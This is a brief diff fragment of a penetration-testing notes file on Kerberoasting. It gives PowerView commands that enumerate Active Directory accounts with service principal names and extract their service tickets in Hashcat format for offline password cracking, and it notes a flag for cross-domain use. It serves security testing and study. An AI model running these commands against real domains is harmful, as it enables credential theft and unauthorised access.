alipali737/pen-test-docs/Operating Systems/Windows/Active Directory/Attack Vectors/Kerberoasting.md

 Import-Module .\PowerView.ps1
 Get-DomainUser * -spn | select samaccountname
 ```
+> This command can also be given a `-Domain` flag for cross-domain kerberoasting
 ### Target a specific user
 ```PowerShell
 Get-DomainUser -Identity [user] | Get-DomainSPNTicket -Format Hashcat